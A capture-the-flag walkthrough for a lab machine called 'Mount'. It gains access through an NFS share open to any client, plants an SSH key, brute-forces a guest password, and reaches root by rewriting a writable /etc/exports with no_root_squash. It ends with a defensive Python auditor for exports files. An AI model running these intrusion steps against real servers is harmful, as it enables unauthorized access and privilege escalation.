
Mount target machine - maze


Mount target machine - Maze

Information gathering

Port scan with Nmap

└─# nmap 172.20.10.2 -sT -p- -sC     
Starting Nmap 7.92 ( https://nmap.org ) at 2025-09-10 02:27 EDT
Nmap scan report for 172.20.10.2
Host is up (0.00042s latency).
Not shown: 65526 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
79/tcp    open  finger
| finger: \x0D
| Welcome to Linux version 4.19.0-27-amd64 at Mount !\x0D
| 
|  02:27:19 up 3 min,  0 users,  load average: 0.04, 0.01, 0.00
| \x0D
|_No one logged on.\x0D
80/tcp    open  http
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      37701/udp   mountd
|   100005  1,2,3      45501/tcp6  mountd
|   100005  1,2,3      48026/udp6  mountd
|   100005  1,2,3      51187/tcp   mountd
|   100021  1,3,4      34593/tcp   nlockmgr
|   100021  1,3,4      43233/tcp6  nlockmgr
|   100021  1,3,4      48578/udp   nlockmgr
|   100021  1,3,4      49562/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl
34593/tcp open  nlockmgr
35695/tcp open  unknown
51187/tcp open  mountd
60235/tcp open  unknown
MAC Address: 08:00:27:8D:16:16 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 12.42 seconds
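
NFS service (ports 2049/111/51187): high risk
NFS (Network File System) is the service that deserves the most attention here; if it is misconfigured, it easily leads to file disclosure or unauthorized access:

Risk: if an NFS export does not restrict client IPs or lacks permission restrictions (for example a no_root_squash configuration), an attacker may be able to mount the shared directory and read or modify sensitive files (such as system configuration or user data).
Suggested verification: run showmount -e 172.20.10.2 (requires the nfs-common tools installed locally) to list the exported directories and their access configuration.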

showmount -e 172.20.10.2

showmount -e 172.20.10.2
Export list for 172.20.10.2:
/home/ll104567 *
The directory is exported in a way that allows every client to mount it (* means there is no IP restriction).

Mounting the share to get a user shell

mkdir -p /mnt/nfs_test

mount -t nfs 172.20.10.2:/home/ll104567 /mnt/nfs_test

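cd nfs_test 
cd: 权限不够: nfs_test

The shell reports permission denied, so create this user locally, enter the directory as that user, and add an SSH key for login.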
useradd -u 6666 nfs_user

 mkdir .ssh
 echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChJ31EeTjZIw5tz/8b2Ma6XyrjI6+FSUfbnWRF7HA6/pMtgTbZGPhKXRzdigHq2NY40KSz7xpeDvpZEbdCjpCiimXfwgALaZpI/GxftyA4C9yWoSQxR7jdK8dWAurA9rnoPnwrOO8F14rg2P2vknrtR70eIklAwbuDvJ8Aq9Ai5tMPaiOx2uJAYRWYRgOd/jP4WhZ8nF88N+E963xFf/Bf37AMV4SVujvasubsmM96t7fOqEBgzyK+xTClVqhzzGKhcr5AfYDvemDnffXEC3Ff+cdkXpW8HhX8FrK6D2HzwpOIN/8hypJNkGssXOZ9E4rTWWoY84VtPvceYMUI7xV44VskmZMLYrBAxfPDzEJV/HHKX1xQXwsHg7WiSRntApPS3BfeMr8ZqJTSBqoTVAnoMAuClPy1Vm1c+mlzvjlCbBBLfLEWNvuslzR9rQMFpMwLN3PoBhyGZ5+gv94QPbicLhNuLdU10KD5dHLtWUoWIGOu2RqtcjjKul+fT62BPy8= root@kali" > authorized_keys
$ ls -al
总用量 12
drwxrwxr-x 2 nfs_user nfs_user 4096  9月 10 02:33 .
drwx------ 3 nfs_user nfs_user 4096  9月 10 02:32 ..
-rw-rw-r-- 1 nfs_user nfs_user  563  9月 10 02:33 authorized_keys

Log in and get the ll user

└─# ssh ll104567@172.20.10.2 -i /root/.ssh/id_rsa 
Linux Mount 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Aug 20 23:46:24 2025 from 192.168.3.94
ll104567@Mount:~$ 
ll104567@Mount:~$ ls
ll104567@Mount:~$ ls -al

Here we also find another user, guest; brute-forcing gives the password lalala, which yields user.txt.

[22][ssh] host: 172.20.10.2   login: guest   password: lalala

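Privilege escalation to root

Here we find that we can reboot the machine and that we can write to exports, the key NFS configuration file; the two can be combined to escalate privileges.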

ll104567@Mount:~$ sudo -l
Matching Defaults entries for ll104567 on Mount:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ll104567 may run the following commands on Mount:
    (ALL) NOPASSWD: /sbin/reboot

ll104567@Mount:~$ ls -al /etc/exports 
-rw-rw---- 1 root ll104567 49 Sep 10 04:03 /etc/exports
ll104567@Mount:~$ 

Change the file contents to

/root *(rw,sync,no_root_squash,no_subtree_check) 

Running sudo /sbin/reboot applies the new configuration; then we mount again.

┌──(root㉿kali)-[/mnt/nfs_test2]
└─# showmount -e 172.20.10.2
Export list for 172.20.10.2:
/root *
mkdir -p /mnt/nfs_test3 
                                                                                                 
┌──(root㉿kali)-[/mnt/nfs_test2]
└─# mount -t nfs 172.20.10.2:/home/ll104567 /mnt/nfs_test3
Created symlink '/run/systemd/system/remote-fs.target.wants/rpc-statd.service' → '/usr/lib/systemd/system/rpc-statd.service'.
mount.nfs: mounting 172.20.10.2:/home/ll104567 failed, reason given by server: No such file or directory
                                                                                                 
┌──(root㉿kali)-[/mnt/nfs_test2]
└─# mount -t nfs 172.20.10.2:/root /mnt/nfs_test3
                                                                                                 
┌──(root㉿kali)-[/mnt/nfs_test2]
└─# cd /mnt/nfs_test3
                                                                                                 
┌──(root㉿kali)-[/mnt/nfs_test3]
└─# ls    
root.txt
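
A defensive check for the two misconfigurations this walkthrough chains (an export open to * and an /etc/exports that a non-root group can write), as an added example that is not part of the original post. The function names, issue labels, the sample file (apart from the /root line shown above) and the gid 1000 are assumptions made for illustration.

```python
import re
import stat

ENTRY = re.compile(r"(?P<host>[^\s()]*)(?:\((?P<opts>[^)]*)\))?")

def audit_exports(text):
    """Return (path, client, issue) findings for exports(5)-style text."""
    findings = []
    for raw in text.replace("\\\n", " ").splitlines():   # join continuations
        line = raw.split("#", 1)[0].strip()              # drop comments
        if not line:
            continue
        path, *clients = line.split()
        defaults = set()
        for tok in clients or [""]:       # no client listed: treated as any host
            if tok.startswith("-"):       # "-opt,opt" sets defaults for later clients
                defaults = set(tok[1:].split(","))
                continue
            m = ENTRY.fullmatch(tok)
            if m is None:
                findings.append((path, tok, "unparsed"))
                continue
            host = m["host"]
            opts = defaults | set(filter(None, (m["opts"] or "").split(",")))
            if host in ("", "*"):         # "*" or a bare "(opts)" matches every client
                findings.append((path, host or "*", "any-host"))
            if "no_root_squash" in opts:  # client uid 0 is not mapped to nobody
                findings.append((path, host or "*", "no_root_squash"))
    return findings

def audit_exports_meta(mode, uid, gid):
    """Flag ownership/mode that lets a non-root account rewrite the exports file."""
    issues = []
    if uid != 0:
        issues.append("owner-not-root")
    if mode & stat.S_IWGRP and gid != 0:
        issues.append("group-writable-non-root-group")
    if mode & stat.S_IWOTH:
        issues.append("world-writable")
    return issues

# Constructed sample: the /root line is the one shown on this page; the rest is invented.
SAMPLE = """\
/home/ll104567 *(rw,sync,no_subtree_check)
/root *(rw,sync,no_root_squash,no_subtree_check)
/srv/data 192.168.3.0/24(ro,root_squash)
"""

if __name__ == "__main__":
    print(audit_exports(SAMPLE))
    # -rw-rw---- root:ll104567 as listed above; gid 1000 is an assumed value
    print(audit_exports_meta(0o660, 0, 1000))
```

On a real server, pass the contents of /etc/exports and the st_mode, st_uid and st_gid values from os.stat("/etc/exports") to the two functions.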
